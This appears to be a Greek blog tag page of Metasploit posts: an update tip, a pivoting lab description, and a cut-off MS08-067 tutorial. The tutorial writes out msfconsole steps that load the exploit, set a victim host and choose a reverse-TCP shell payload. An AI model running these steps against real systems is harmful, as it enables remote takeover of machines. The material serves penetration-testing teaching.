Μετάβαση στο κύριο περιεχόμενο

Αναρτήσεις

Εμφάνιση αναρτήσεων με την ετικέτα metasploit

Πως κάνουμε αναβάθμιση το msfconsole?

Καλησπέρα σας αν έχετε καιρό που δουλεύετε το msf ήρθε η ώρα για ένα update.
Η διαδικασία είναι απλή. Ανοίγουμε εν τερματικό, και στην συνεχεια πληκτρολογούμε την παρακάτω εντολή!

root@Kail-flames:~# msfupdate

Exploit Windows just with an excel document

Client side attack

*** There is a sound problem on video ***
You are a Penetration Tester and you’re asked to determine if the

corporate network is secure and if we are able to reach the servers

withing the DMZ.

The internal corporate network is divided in two

segments: the internal network where the employees machine reside and

the DMZ where there are company servers.

######## GOALS #############

1) Gain access to the internal network

2) Exploit and get a shell to a server within the DMZ
############WHAT YOU WILL LEARN ################

1) How to use Client-Side attacks

2) Pivoting

3) Fingerprint Hosts and Services though Pivoting

To guide you during the lab you will find different Tasks.

Tasks are meant for educational purposes and to show you the usage of

different tools and different methods to achieve the same goal.

They are not meant to be used as a methodology.
RECOMMENDED TOOLS

1)metasploit

2) nmap

3) proxychains

4) Mail client ( i.e. Thunderbird )
IMPORTANT N OTE

Labs machines (like web server …

Πρόσβαση σε απόμακρο υπολογιστή με χρήση του ms08_, ex067_netapi exploit

Σε αυτό το tutorial θα δούμε έναν από τους τρόπους με τους οποίους μπορούμε να αποκτήσουμε τον έλεγχο σε ένα απομακρυσμένο υπολογιστή με τη χρήση του ms08_067_netapi exploit.
Ανοίγω ένα τερματικό...
Terminal: 
root@bt:msfconsole <- font="">
[περιμένουμε να ενεργοποιηθεί λίγο το msfconsole]...
msf > search ms08_067_netapi <- font="">

[*] Searching loaded modules for pattern 'ms08_067_netapi'...
Exploits
========
Name
----
windows/smb/ms08_067_netapi
Corruption
Rank
----
great
Description
-----------
Microsoft Server Service Relative Path Stack

Συνχίζουμε γράφοντας τις παρακάτω εντολές...msf > use windows/smb/ms08_067_netapi <- span="">
msf exploit(ms08_067_netapi) > show options <- span="">
msf exploit(ms08_067_netapi) > set RHOST 192.168.33.130 <- ip="" span="" victim="">
RHOST => 192.168.33.130
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp <- span="&qu…